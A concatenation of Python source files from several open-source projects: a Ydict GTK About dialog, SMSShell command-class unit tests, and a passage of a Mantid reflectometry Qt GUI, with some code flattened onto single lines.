glib.Variant.new_int32(id_) else: action_data = None app.activate_action(action, action_data) run_args = [sys.argv[0]] + unknown_args logger.debug("run {}".format(run_args)) status = app.run(run_args) logger.debug("app exited") sys.exit(status) elif hasattr(hamster_client, action): getattr(hamster_client, action)(*args.action_args) else: sys.exit(usage % {'prog': sys.argv[0]})
wiiiky/ydict
pydict/about.py
# encoding=utf-8

from gi.repository import Gtk
from .i18n import _


class AboutDialog(Gtk.AboutDialog):
    """Modal "About" window describing the Ydict application."""

    def __init__(self, parent):
        """Create the dialog as a modal child of *parent*."""
        super(AboutDialog, self).__init__(title=_('About'), parent=parent)
        self.set_modal(True)
        author = 'Wiky L<wiiiky@outlook.com>'
        # Application metadata rendered by the stock Gtk about dialog;
        # applied in order via the corresponding setter for each field.
        for setter, value in (
                (self.set_program_name, 'Ydict'),
                (self.set_authors, [author]),
                (self.set_artists, [author]),
                (self.set_comments, ''),
                (self.set_copyright, 'Copyright (c) Wiky L 2015'),
                (self.set_license_type, Gtk.License.GPL_3_0),
                (self.set_logo_icon_name, 'ydict'),
                (self.set_version, '1.0'),
                (self.set_website, 'https://github.com/wiiiky/ydict'),
                (self.set_website_label, 'GitHub'),
                (self.set_wrap_license, True)):
            setter(value)
Turgon37/SMSShell
tests/test_smsshell_commands.py
# -*- coding: utf8 -*-

import argparse
import logging
import pytest

import SMSShell
import SMSShell.commands


def _instantiate(command_class):
    """Build a command instance with a real logger and dummy collaborators.

    Every test constructs commands the same way; the three ``object()``
    placeholders stand in for the shell, storage and messaging dependencies
    that the abstract-contract tests never touch.
    """
    return command_class(logging.getLogger(), object(), object(), object())


def test_abstract_init():
    """The command name defaults to the lowercased class name."""
    # NOTE: renamed the local from `abs`, which shadowed the builtin.
    command = _instantiate(SMSShell.commands.AbstractCommand)
    assert command.name == 'abstractcommand'


def test_abstract_not_implemented():
    """Abstract hook methods must raise CommandBadImplemented."""
    command = _instantiate(SMSShell.commands.AbstractCommand)
    with pytest.raises(SMSShell.commands.CommandBadImplemented):
        command.description([])
    with pytest.raises(SMSShell.commands.CommandBadImplemented):
        command.usage([])
    with pytest.raises(SMSShell.commands.CommandBadImplemented):
        command.main([])


def test_abstract_bad_input_state_type():
    """inputStates() returning a non-list type is rejected."""
    class Bad(SMSShell.commands.AbstractCommand):
        def inputStates(self):
            return dict()
    com = _instantiate(Bad)
    with pytest.raises(SMSShell.commands.CommandBadImplemented):
        com._inputStates()


def test_abstract_bad_input_state_value():
    """inputStates() returning invalid state values is rejected."""
    class Bad(SMSShell.commands.AbstractCommand):
        def inputStates(self):
            return ['d']
    com = _instantiate(Bad)
    with pytest.raises(SMSShell.commands.CommandBadImplemented):
        com._inputStates()


def test_abstract_bad_arg_parser_type():
    """argsParser() returning a non-parser object is rejected."""
    class Bad(SMSShell.commands.AbstractCommand):
        def argsParser(self):
            return 'a'
    com = _instantiate(Bad)
    with pytest.raises(SMSShell.commands.CommandBadImplemented):
        com._argsParser()


def test_abstract_bad_arg_parser_init():
    """An argsParser() that raises is wrapped as CommandBadImplemented."""
    class Bad(SMSShell.commands.AbstractCommand):
        def argsParser(self):
            raise ValueError('no')
    com = _instantiate(Bad)
    with pytest.raises(SMSShell.commands.CommandBadImplemented):
        com._argsParser()
dymkowsk/mantid
scripts/Interface/ui/reflectometer/refl_gui.py
# pylint: disable = too-many-lines, invalid-name, line-too-long, too-many-instance-attributes, # pylint: disable = too-many-branches,too-many-locals, too-many-nested-blocks from __future__ import (absolute_import, division, print_function) try: from mantidplot import * except ImportError: canMantidPlot = False # import csv import os import re from operator import itemgetter import itertools from PyQt4 import QtCore, QtGui from mantid.simpleapi import * from isis_reflectometry.quick import * from isis_reflectometry.convert_to_wavelength import ConvertToWavelength from isis_reflectometry import load_live_runs from isis_reflectometry.combineMulti import * import mantidqtpython from mantid.api import Workspace, WorkspaceGroup, CatalogManager, AlgorithmManager from mantid import UsageService from ui.reflectometer.ui_refl_window import Ui_windowRefl from ui.reflectometer.refl_save import Ui_SaveWindow from ui.reflectometer.refl_choose_col import ReflChoose from ui.reflectometer.refl_options import ReflOptions try: _fromUtf8 = QtCore.QString.fromUtf8 except AttributeError: def _fromUtf8(s): return s canMantidPlot = True class ReflGui(QtGui.QMainWindow, Ui_windowRefl): current_instrument = None current_table = None current_polarisation_method = None labelStatus = None accMethod = None def __init__(self): """ Initialise the interface """ super(QtGui.QMainWindow, self).__init__() self.setupUi(self) self.loading = False self.clip = QtGui.QApplication.clipboard() self.shown_cols = {} self.mod_flag = False self.run_cols = [0, 5, 10] self.angle_cols = [1, 6, 11] self.scale_col = 16 self.stitch_col = 17 self.plot_col = 18 self.__graphs = dict() self._last_trans = "" self.icat_file_map = None self.__instrumentRuns = None self.__icat_download = False self.__group_tof_workspaces = True # Q Settings self.__generic_settings = "Mantid/ISISReflGui" self.__live_data_settings = "Mantid/ISISReflGui/LiveData" self.__search_settings = "Mantid/ISISReflGui/Search" self.__column_settings = 
"Mantid/ISISReflGui/Columns" self.__icat_download_key = "icat_download" self.__ads_use_key = "AlgUse" self.__alg_migration_key = "AlgUseReset" self.__live_data_frequency_key = "frequency" self.__live_data_method_key = "method" self.__group_tof_workspaces_key = "group_tof_workspaces" self.__stitch_right_key = "stitch_right" # Setup instrument with defaults assigned. self.instrument_list = ['INTER', 'SURF', 'CRISP', 'POLREF', 'OFFSPEC'] self.polarisation_instruments = ['CRISP', 'POLREF'] self.polarisation_options = {'None': PolarisationCorrection.NONE, '1-PNR': PolarisationCorrection.PNR, '2-PA': PolarisationCorrection.PA} # Set the live data settings, use default if none have been set before settings = QtCore.QSettings() settings.beginGroup(self.__live_data_settings) self.live_method = settings.value(self.__live_data_method_key, "", type=str) self.live_freq = settings.value(self.__live_data_frequency_key, 0, type=float) if not self.live_freq: logger.information( "No settings were found for Update frequency of loading live data, Loading default of 60 seconds") self.live_freq = float(60) settings.setValue(self.__live_data_frequency_key, self.live_freq) if not self.live_method: logger.information( "No settings were found for Accumulation Method of loading live data, Loading default of \"Add\"") self.live_method = "Add" settings.setValue(self.__live_data_method_key, self.live_method) settings.endGroup() settings.beginGroup(self.__generic_settings) self.__alg_migrate = settings.value(self.__alg_migration_key, True, type=bool) if self.__alg_migrate: self.__alg_use = True # We will use the algorithms by default rather than the quick scripts self.__alg_migrate = False # Never do this again. We only want to reset once. 
else: self.__alg_use = settings.value(self.__ads_use_key, True, type=bool) self.__icat_download = settings.value(self.__icat_download_key, False, type=bool) self.__group_tof_workspaces = settings.value(self.__group_tof_workspaces_key, True, type=bool) self.__scale_right = settings.value(self.__stitch_right_key, True, type=bool) settings.setValue(self.__ads_use_key, self.__alg_use) settings.setValue(self.__icat_download_key, self.__icat_download) settings.setValue(self.__group_tof_workspaces_key, self.__group_tof_workspaces) settings.setValue(self.__alg_migration_key, self.__alg_migrate) settings.setValue(self.__stitch_right_key, self.__scale_right) settings.endGroup() del settings # register startup UsageService.registerFeatureUsage("Interface", "ISIS Reflectomety", False) def __del__(self): """ Save the contents of the table if the modified flag was still set """ if self.mod_flag: self._save(true) def _save_check(self): """ Show a custom message box asking if the user wants to save, or discard their changes or cancel back to the interface """ msgBox = QtGui.QMessageBox() msgBox.setText("The table has been modified. Do you want to save your changes?") accept_btn = QtGui.QPushButton('Save') cancel_btn = QtGui.QPushButton('Cancel') discard_btn = QtGui.QPushButton('Discard') msgBox.addButton(accept_btn, QtGui.QMessageBox.AcceptRole) msgBox.addButton(cancel_btn, QtGui.QMessageBox.RejectRole) msgBox.addButton(discard_btn, QtGui.QMessageBox.NoRole) msgBox.setIcon(QtGui.QMessageBox.Question) msgBox.setDefaultButton(accept_btn) msgBox.setEscapeButton(cancel_btn) msgBox.exec_() btn = msgBox.clickedButton() saved = None if btn.text() == accept_btn.text(): ret = QtGui.QMessageBox.AcceptRole saved = self._save() elif btn.text() == cancel_btn.text(): ret = QtGui.QMessageBox.RejectRole else: ret = QtGui.QMessageBox.NoRole return ret, saved def closeEvent(self, event): """ Close the window. 
but check if the user wants to save """ self.buttonProcess.setFocus() if self.mod_flag: event.ignore() ret, saved = self._save_check() if ret == QtGui.QMessageBox.AcceptRole: if saved: self.mod_flag = False event.accept() elif ret == QtGui.QMessageBox.RejectRole: event.ignore() elif ret == QtGui.QMessageBox.NoRole: self.mod_flag = False event.accept() def _instrument_selected(self, instrument): """ Change the default instrument to the selected one """ config['default.instrument'] = self.instrument_list[instrument] logger.notice("Instrument is now: " + str(config['default.instrument'])) self.textRB.clear() self._populate_runs_list() self.current_instrument = self.instrument_list[instrument] self.comboPolarCorrect.setEnabled( self.current_instrument in self.polarisation_instruments) # Enable as appropriate self.comboPolarCorrect.setCurrentIndex(self.comboPolarCorrect.findText('None')) # Reset to None def _table_modified(self, row, column): """ sets the modified flag when the table is altered """ # Sometimes users enter leading or trailing whitespace into a cell. # Let's remove it for them automatically. item = self.tableMain.item(row, column) item.setData(0, str.strip(str(item.data(0)))) if not self.loading: self.mod_flag = True plotbutton = self.tableMain.cellWidget(row, self.plot_col).children()[1] self.__reset_plot_button(plotbutton) def _plot_row(self): """ handler for the plot buttons """ plotbutton = self.sender() self._plot(plotbutton) def _show_slit_calculator(self): calc = mantidqtpython.MantidQt.MantidWidgets.SlitCalculator(self) calc.setCurrentInstrumentName(self.current_instrument) calc.processInstrumentHasBeenChanged() calc.exec_() def _polar_corr_selected(self): """ Event handler for polarisation correction selection. 
""" if self.current_instrument in self.polarisation_instruments: chosen_method = self.comboPolarCorrect.currentText() self.current_polarisation_method = self.polarisation_options[chosen_method] else: logger.notice("Polarisation correction is not supported on " + str(self.current_instrument)) def setup_layout(self): """ Do further setup layout that couldn't be done in the designer """ self.comboInstrument.addItems(self.instrument_list) current_instrument = config['default.instrument'].upper() if current_instrument in self.instrument_list: self.comboInstrument.setCurrentIndex(self.instrument_list.index(current_instrument)) else: self.comboInstrument.setCurrentIndex(0) config['default.instrument'] = 'INTER' self.current_instrument = config['default.instrument'].upper() # Setup polarisation options with default assigned self.comboPolarCorrect.clear() self.comboPolarCorrect.addItems(list(self.polarisation_options.keys())) self.comboPolarCorrect.setCurrentIndex(self.comboPolarCorrect.findText('None')) self.current_polarisation_method = self.polarisation_options['None'] self.comboPolarCorrect.setEnabled(self.current_instrument in self.polarisation_instruments) self.splitterList.setSizes([200, 800]) self.labelStatus = QtGui.QLabel("Ready") self.statusMain.addWidget(self.labelStatus) self._initialise_table() self._populate_runs_list() self._connect_slots() return True def _reset_table(self): """ Reset the plot buttons and stitch checkboxes back to thier defualt state """ # switches from current to true, to false to make sure stateChanged fires self.checkTickAll.setCheckState(2) self.checkTickAll.setCheckState(0) for row in range(self.tableMain.rowCount()): plotbutton = self.tableMain.cellWidget(row, self.plot_col).children()[1] self.__reset_plot_button(plotbutton) def __reset_plot_button(self, plotbutton): """ Reset the provided plot button to ti's default state: disabled and with no cache """ plotbutton.setDisabled(True) plotbutton.setProperty('runno', None) 
plotbutton.setProperty('overlapLow', None) plotbutton.setProperty('overlapHigh', None) plotbutton.setProperty('wksp', None) def _initialise_table(self): """ Initialise the table. Clearing all data and adding the checkboxes and plot buttons """ # first check if the table has been changed before clearing it if self.mod_flag: ret, _saved = self._save_check() if ret == QtGui.QMessageBox.RejectRole: return self.current_table = None settings = QtCore.QSettings() settings.beginGroup(self.__column_settings) for column in range(self.tableMain.columnCount()): for row in range(self.tableMain.rowCount()): if column in self.run_cols: item = QtGui.QTableWidgetItem() item.setText('') item.setToolTip('Runs can be colon delimited to coadd them') self.tableMain.setItem(row, column, item) elif column in self.angle_cols: item = QtGui.QTableWidgetItem() item.setText('') item.setToolTip('Angles are in degrees') self.tableMain.setItem(row, column, item) elif column == self.stitch_col: check = QtGui.QCheckBox() check.setCheckState(False) check.setToolTip('If checked, the runs in this row will be stitched together') item = QtGui.QWidget() layout = QtGui.QHBoxLayout(item) layout.addWidget(check) layout.setAlignment(QtCore.Qt.AlignCenter) layout.setSpacing(0) layout.setContentsMargins(0, 0, 0, 0) item.setLayout(layout) item.setContentsMargins(0, 0, 0, 0) self.tableMain.setCellWidget(row, self.stitch_col, item) elif column == self.plot_col: button = QtGui.QPushButton('Plot') button.setProperty("row", row) self.__reset_plot_button(button) button.setToolTip('Plot the workspaces produced by processing this row.') button.clicked.connect(self._plot_row) item = QtGui.QWidget() layout = QtGui.QHBoxLayout(item) layout.addWidget(button) layout.setAlignment(QtCore.Qt.AlignCenter) layout.setSpacing(0) layout.setContentsMargins(0, 0, 0, 0) item.setLayout(layout) item.setContentsMargins(0, 0, 0, 0) self.tableMain.setCellWidget(row, self.plot_col, item) else: item = QtGui.QTableWidgetItem() 
item.setText('') self.tableMain.setItem(row, column, item) vis_state = settings.value(str(column), True, type=bool) self.shown_cols[column] = vis_state if vis_state: self.tableMain.showColumn(column) else: self.tableMain.hideColumn(column) settings.endGroup() del settings self.tableMain.resizeColumnsToContents() self.mod_flag = False def _connect_slots(self): """ Connect the signals to the corresponding methods """ self.checkTickAll.stateChanged.connect(self._set_all_stitch) self.comboInstrument.activated[int].connect(self._instrument_selected) self.comboPolarCorrect.activated.connect(self._polar_corr_selected) self.textRB.returnPressed.connect(self._populate_runs_list) self.buttonAuto.clicked.connect(self._autofill) self.buttonSearch.clicked.connect(self._populate_runs_list) self.buttonClear.clicked.connect(self._initialise_table) self.buttonProcess.clicked.connect(self._process) self.buttonTransfer.clicked.connect(self._transfer) self.buttonColumns.clicked.connect(self._choose_columns) self.actionOpen_Table.triggered.connect(self._load_table) self.actionReload_from_Disk.triggered.connect(self._reload_table) self.actionSave.triggered.connect(self._save) self.actionSave_As.triggered.connect(self._save_as) self.actionSave_Workspaces.triggered.connect(self._save_workspaces) self.actionClose_Refl_Gui.triggered.connect(self.close) self.actionMantid_Help.triggered.connect(self._show_help) self.actionAutofill.triggered.connect(self._autofill) self.actionSearch_RB.triggered.connect(self._populate_runs_list) self.actionClear_Table.triggered.connect(self._initialise_table) self.actionProcess.triggered.connect(self._process) self.actionTransfer.triggered.connect(self._transfer) self.tableMain.cellChanged.connect(self._table_modified) self.actionClear.triggered.connect(self._clear_cells) self.actionPaste.triggered.connect(self._paste_cells) self.actionCut.triggered.connect(self._cut_cells) self.actionCopy.triggered.connect(self._copy_cells) 
self.actionChoose_Columns.triggered.connect(self._choose_columns) self.actionRefl_Gui_Options.triggered.connect(self._options_dialog) self.actionSlit_Calculator.triggered.connect(self._show_slit_calculator) def __valid_rb(self): # Ensure that you cannot put zero in for an rb search rbSearchValidator = QtGui.QIntValidator(self) current_text = self.textRB.text() rbSearchValidator.setBottom(1) state = rbSearchValidator.validate(current_text, 0)[0] if state == QtGui.QValidator.Acceptable: return True else: self.textRB.clear() if current_text: logger.warning("RB search restricted to numbers > 0") return False def _populate_runs_list(self): """ Populate the list at the right with names of runs and workspaces from the archives """ # Clear existing self.listMain.clear() if self.__valid_rb(): # Use ICAT for a journal search based on the RB number active_session_id = None if CatalogManager.numberActiveSessions() == 0: # Execute the CatalogLoginDialog login_alg = CatalogLoginDialog() session_object = login_alg.getProperty("KeepAlive").value active_session_id = session_object.getPropertyValue("Session") # Fetch out an existing session id active_session_id = CatalogManager.getActiveSessions()[-1].getSessionId() # This might be another catalog session, but at present there is no way to tell. 
search_alg = AlgorithmManager.create('CatalogGetDataFiles') search_alg.initialize() search_alg.setChild(True) # Keeps the results table out of the ADS search_alg.setProperty('InvestigationId', str(self.textRB.text())) search_alg.setProperty('Session', active_session_id) search_alg.setPropertyValue('OutputWorkspace', '_dummy') search_alg.execute() search_results = search_alg.getProperty('OutputWorkspace').value self.icat_file_map = {} self.statusMain.clearMessage() for row in search_results: file_name = row['Name'] file_id = row['Id'] description = row['Description'] run_number = re.search(r'[1-9]\d+', file_name).group() if bool(re.search('(raw)$', file_name, re.IGNORECASE)): # Filter to only display and map raw files. title = (run_number + ': ' + description).strip() self.icat_file_map[title] = (file_id, run_number, file_name) self.listMain.addItem(title) self.listMain.sortItems() del search_results def _autofill(self): """ copy the contents of the selected cells to the row below as long as the row below contains a run number in the first cell """ # make sure all selected cells are in the same row sum = 0 howMany = len(self.tableMain.selectedItems()) for cell in self.tableMain.selectedItems(): sum = sum + self.tableMain.row(cell) if howMany: selectedrow = self.tableMain.row(self.tableMain.selectedItems()[0]) if sum / howMany == selectedrow: startrow = selectedrow + 1 filled = 0 for cell in self.tableMain.selectedItems(): row = startrow txt = cell.text() while self.tableMain.item(row, 0).text() != '': item = QtGui.QTableWidgetItem() item.setText(txt) self.tableMain.setItem(row, self.tableMain.column(cell), item) row = row + 1 filled = filled + 1 if not filled: QtGui.QMessageBox.critical(self.tableMain, 'Cannot perform Autofill', "No target cells to autofill. 
Rows to be filled should contain a run number in their " "first cell, and start from directly below the selected line.") else: QtGui.QMessageBox.critical(self.tableMain, 'Cannot perform Autofill', "Selected cells must all be in the same row.") else: QtGui.QMessageBox.critical(self.tableMain, 'Cannot perform Autofill', "There are no source cells selected.") def _clear_cells(self): """ Clear the selected area of data """ cells = self.tableMain.selectedItems() for cell in cells: column = cell.column() if column < self.stitch_col: cell.setText('') def _cut_cells(self): """ copy the selected cells then clear the area """ self._copy_cells() self._clear_cells() def _copy_cells(self): """ Copy the selected ranage of cells to the clipboard """ cells = self.tableMain.selectedItems() if not cells: print 'nothing to copy' return # first discover the size of the selection and initialise a list mincol = cells[0].column() if mincol > self.scale_col: logger.error("Cannot copy, all cells out of range") return maxrow = -1 maxcol = -1 minrow = cells[0].row() for cell in reversed(range(len(cells))): col = cells[cell].column() if col < self.stitch_col: maxcol = col maxrow = cells[cell].row() break colsize = maxcol - mincol + 1 rowsize = maxrow - minrow + 1 selection = [['' for x in range(colsize)] for y in range(rowsize)] # now fill that list for cell in cells: row = cell.row() col = cell.column() if col < self.stitch_col: selection[row - minrow][col - mincol] = str(cell.text()) tocopy = '' for y in range(rowsize): for x in range(colsize): if x > 0: tocopy += '\t' tocopy += selection[y][x] if y < (rowsize - 1): tocopy += '\n' self.clip.setText(str(tocopy)) def _paste_cells(self): """ Paste the contents of the clipboard to the table at the selected position """ pastedtext = self.clip.text() if not pastedtext: logger.warning("Nothing to Paste") return selected = self.tableMain.selectedItems() if not selected: logger.warning("Cannot paste, no editable cells selected") return pasted = 
pastedtext.splitlines() pastedcells = [] for row in pasted: pastedcells.append(row.split('\t')) pastedcols = len(pastedcells[0]) pastedrows = len(pastedcells) if len(selected) > 1: # discover the size of the selection mincol = selected[0].column() if mincol > self.scale_col: logger.error("Cannot copy, all cells out of range") return minrow = selected[0].row() # now fill that list for cell in selected: row = cell.row() col = cell.column() if col < self.stitch_col and (col - mincol) < pastedcols and (row - minrow) < pastedrows and len( pastedcells[row - minrow]): cell.setText(pastedcells[row - minrow][col - mincol]) elif selected: # when only a single cell is selected, paste all the copied item up until the table limits cell = selected[0] currow = cell.row() homecol = cell.column() tablerows = self.tableMain.rowCount() for row in pastedcells: if len(row): curcol = homecol if currow < tablerows: for col in row: if curcol < self.stitch_col: curcell = self.tableMain.item(currow, curcol) curcell.setText(col) curcol += 1 else: # the row has hit the end of the editable cells break currow += 1 else: # it's dropped off the bottom of the table break else: logger.warning("Cannot paste, no editable cells selected") def _transfer(self): """ Transfer run numbers to the table """ tup = () for idx in self.listMain.selectedItems(): split_title = re.split(":th=|th=|:|dq/q=", idx.text()) if len(split_title) < 3: split_title = re.split(":", idx.text()) if len(split_title) < 2: logger.warning('cannot transfer ' + idx.text() + ' title is not in the right form ') continue else: theta = 0 split_title.append(theta) # Append a dummy theta value. if len(split_title) < 4: dqq = 0 split_title.append(dqq) # Append a dummy dq/q value. 
tup = tup + (split_title,) # Tuple of lists containing (run number, title, theta, dq/q) tupsort = sorted(tup, key=itemgetter(1, 2)) # now sorted by title then theta row = 0 for _key, group in itertools.groupby(tupsort, lambda x: x[1]): # now group by title col = 0 dqq = 0 # only one value of dqq per row run_angle_pairs_of_title = list() # for storing run_angle pairs all with the same title for object in group: # loop over all with equal title run_no = object[0] dqq = object[-1] angle = object[-2] run_angle_pairs_of_title.append((run_no, angle)) for angle_key, group in itertools.groupby(run_angle_pairs_of_title, lambda x: x[1]): runnumbers = "+".join(["%s" % pair[0] for pair in group]) # set the runnumber item = QtGui.QTableWidgetItem() item.setText(str(runnumbers)) self.tableMain.setItem(row, col, item) # Set the angle item = QtGui.QTableWidgetItem() item.setText(str(angle_key)) self.tableMain.setItem(row, col + 1, item) # Set the transmission item = QtGui.QTableWidgetItem() item.setText(self.textRuns.text()) self.tableMain.setItem(row, col + 2, item) col = col + 5 if col >= 11: col = 0 # set dq/q item = QtGui.QTableWidgetItem() item.setText(str(dqq)) self.tableMain.setItem(row, 15, item) row = row + 1 if self.__icat_download: # If ICAT is being used for download, then files must be downloaded at the same time as they are transferred contents = str(idx.text()).strip() file_id, _runnumber, file_name = self.icat_file_map[contents] active_session_id = CatalogManager.getActiveSessions()[-1].getSessionId() # This might be another catalog session, but at present there is no way to tell. save_location = config['defaultsave.directory'] CatalogDownloadDataFiles(file_id, FileNames=file_name, DownloadPath=save_location, Session=active_session_id) current_search_dirs = config.getDataSearchDirs() if save_location not in current_search_dirs: config.appendDataSearchDir(save_location) def _set_all_stitch(self, state): """ Set the checkboxes in the Stitch? 
column to the same """ for row in range(self.tableMain.rowCount()): self.tableMain.cellWidget(row, self.stitch_col).children()[1].setCheckState(state) def __checked_row_stiched(self, row): return self.tableMain.cellWidget(row, self.stitch_col).children()[1].checkState() > 0 def _process(self): """ Process has been pressed, check what has been selected then pass the selection (or whole table) to quick """ # --------- If "Process" button pressed, convert raw files to IvsLam and IvsQ and combine if checkbox ticked ------------- _overallQMin = float("inf") _overallQMax = float("-inf") try: willProcess = True rows = self.tableMain.selectionModel().selectedRows() rowIndexes = [] for idx in rows: rowIndexes.append(idx.row()) if not len(rowIndexes): reply = QtGui.QMessageBox.question(self.tableMain, 'Process all rows?', "This will process all rows in the table. Continue?", QtGui.QMessageBox.Yes, QtGui.QMessageBox.No) if reply == QtGui.QMessageBox.No: logger.notice("Cancelled!") willProcess = False else: rowIndexes = range(self.tableMain.rowCount()) if willProcess: for row in rowIndexes: # range(self.tableMain.rowCount()): runno = [] wksp = [] overlapLow = [] overlapHigh = [] if self.tableMain.item(row, 0).text() != '': self.statusMain.showMessage("Processing row: " + str(row + 1)) logger.debug("Processing row: " + str(row + 1)) for i in range(3): run_entry = str(self.tableMain.item(row, i * 5).text()) if run_entry != '': runno.append(run_entry) ovLow = str(self.tableMain.item(row, (i * 5) + 3).text()) if ovLow != '': overlapLow.append(float(ovLow)) ovHigh = str(self.tableMain.item(row, (i * 5) + 4).text()) if ovHigh != '': overlapHigh.append(float(ovHigh)) # Determine resolution if self.tableMain.item(row, 15).text() == '': loadedRun = None if load_live_runs.is_live_run(runno[0]): loadedRun = load_live_runs.get_live_data(config['default.instrument'], frequency=self.live_freq, accumulation=self.live_method) else: Load(Filename=runno[0], OutputWorkspace="_run") loadedRun = 
mtd["_run"] theta_in_str = str(self.tableMain.item(row, 1).text()) try: theta_in = None if len(theta_in_str) > 0: theta_in = float(theta_in_str) # Make sure we only ever run calculate resolution on a non-group workspace. # If we're given a group workspace, we can just run it on the first member of the group instead thetaRun = loadedRun if isinstance(thetaRun, WorkspaceGroup): thetaRun = thetaRun[0] if not theta_in: theta_in = getLogValue(thetaRun, "Theta") dqq = NRCalculateSlitResolution(Workspace=thetaRun, TwoTheta=2*theta_in) # Put the calculated resolution into the table resItem = QtGui.QTableWidgetItem() resItem.setText(str(dqq)) self.tableMain.setItem(row, 15, resItem) # Update the value for theta_in in the table ttItem = QtGui.QTableWidgetItem() ttItem.setText(str(theta_in)) self.tableMain.setItem(row, 1, ttItem) logger.notice("Calculated resolution: " + str(dqq)) except: self.statusMain.clearMessage() logger.error( "Failed to calculate dq/q because we could not find theta in the workspace's sample log. " "Try entering theta or dq/q manually.") return else: dqq = float(self.tableMain.item(row, 15).text()) # Check secondary and tertiary theta_in columns, if they're # blank and their corresponding run columns are set, fill them. 
for run_col in [5, 10]: tht_col = run_col + 1 run_val = str(self.tableMain.item(row, run_col).text()) tht_val = str(self.tableMain.item(row, tht_col).text()) if run_val and not tht_val: Load(Filename=run_val, OutputWorkspace="_run") loadedRun = mtd["_run"] tht_val = getLogValue(loadedRun, "Theta") if tht_val: self.tableMain.item(row, tht_col).setText(str(tht_val)) # Populate runlist first_wq = None for i in range(0, len(runno)): theta, qmin, qmax, _wlam, wqBinnedAndScaled, _wqUnBinnedAndUnScaled = \ self._do_run(runno[i], row, i) if not first_wq: first_wq = wqBinnedAndScaled # Cache the first Q workspace theta = round(theta, 3) qmin = round(qmin, 3) qmax = round(qmax, 3) wksp.append(wqBinnedAndScaled.name()) if self.tableMain.item(row, i * 5 + 1).text() == '': item = QtGui.QTableWidgetItem() item.setText(str(theta)) self.tableMain.setItem(row, i * 5 + 1, item) if self.tableMain.item(row, i * 5 + 3).text() == '': item = QtGui.QTableWidgetItem() item.setText(str(qmin)) self.tableMain.setItem(row, i * 5 + 3, item) overlapLow.append(qmin) if self.tableMain.item(row, i * 5 + 4).text() == '': item = QtGui.QTableWidgetItem() item.setText(str(qmax)) self.tableMain.setItem(row, i * 5 + 4, item) overlapHigh.append(qmax) if wksp[i].find(',') > 0 or wksp[i].find(':') > 0: wksp[i] = first_wq.name() if self.__checked_row_stiched(row): if len(runno) == 1: logger.notice("Nothing to combine for processing row : " + str(row)) else: w1 = getWorkspace(wksp[0]) w2 = getWorkspace(wksp[-1]) if len(runno) == 2: outputwksp = runno[0] + '_' + runno[1][3:] else: outputwksp = runno[0] + '_' + runno[-1][3:] # get Qmax if self.tableMain.item(row, i * 5 + 4).text() == '': overlapHigh = 0.3 * max(w1.readX(0)) Qmin = min(w1.readX(0)) Qmax = max(w2.readX(0)) if len(self.tableMain.item(row, i * 5 + 3).text()) > 0: Qmin = float(self.tableMain.item(row, i * 5 + 3).text()) if len(self.tableMain.item(row, i * 5 + 4).text()) > 0: Qmax = float(self.tableMain.item(row, i * 5 + 4).text()) if Qmax > 
_overallQMax: _overallQMax = Qmax if Qmin < _overallQMin: _overallQMin = Qmin combineDataMulti(wksp, outputwksp, overlapLow, overlapHigh, _overallQMin, _overallQMax, -dqq, 1, keep=True, scale_right=self.__scale_right) # Enable the plot button plotbutton = self.tableMain.cellWidget(row, self.plot_col).children()[1] plotbutton.setProperty('runno', runno) plotbutton.setProperty('overlapLow', overlapLow) plotbutton.setProperty('overlapHigh', overlapHigh) plotbutton.setProperty('wksp', wksp) plotbutton.setEnabled(True) self.statusMain.clearMessage() self.accMethod = None self.statusMain.clearMessage() except: self.statusMain.clearMessage() raise def _plot(self, plotbutton): """ Plot the row belonging to the selected button """ if not isinstance(plotbutton, QtGui.QPushButton): logger.error("Problem accessing cached data: Wrong data type passed, expected QtGui.QPushbutton") return import unicodedata # make sure the required data can be retrieved properly try: runno_u = plotbutton.property('runno') runno = [] for uni in runno_u: runno.append(unicodedata.normalize('NFKD', uni).encode('ascii', 'ignore')) wksp_u = plotbutton.property('wksp') wksp = [] for uni in wksp_u: wksp.append(unicodedata.normalize('NFKD', uni).encode('ascii', 'ignore')) overlapLow = plotbutton.property('overlapLow') overlapHigh = plotbutton.property('overlapHigh') row = plotbutton.property('row') wkspBinned = [] w1 = getWorkspace(wksp[0]) w2 = getWorkspace(wksp[len(wksp) - 1]) dqq = float(self.tableMain.item(row, 15).text()) except: logger.error("Unable to plot row, required data couldn't be retrieved") self.__reset_plot_button(plotbutton) return for i in range(len(runno)): if len(overlapLow): Qmin = overlapLow[0] else: Qmin = min(w1.readX(0)) if len(overlapHigh): Qmax = overlapHigh[len(overlapHigh) - 1] else: Qmax = max(w2.readX(0)) ws_name_binned = wksp[i] wkspBinned.append(ws_name_binned) wsb = getWorkspace(ws_name_binned) _Imin = min(wsb.readY(0)) _Imax = max(wsb.readY(0)) if canMantidPlot: # Get 
the existing graph if it exists base_graph = self.__graphs.get(wksp[0], None) # Clear the window if we're the first of a new set of curves clearWindow = (i == 0) # Plot the new curve base_graph = plotSpectrum(ws_name_binned, 0, True, window=base_graph, clearWindow=clearWindow) # Save the graph so we can re-use it self.__graphs[wksp[i]] = base_graph titl = groupGet(ws_name_binned, 'samp', 'run_title') if isinstance(titl, str): base_graph.activeLayer().setTitle(titl) base_graph.activeLayer().setAxisScale(Layer.Left, _Imin * 0.1, _Imax * 10, Layer.Log10) base_graph.activeLayer().setAxisScale(Layer.Bottom, Qmin * 0.9, Qmax * 1.1, Layer.Log10) base_graph.activeLayer().setAutoScale() # Create and plot stitched outputs if self.__checked_row_stiched(row): if len(runno) == 2: outputwksp = runno[0] + '_' + runno[1][3:] else: outputwksp = runno[0] + '_' + runno[2][3:] if not getWorkspace(outputwksp, report_error=False): # Stitching has not been done as part of processing, so we need to do it here. 
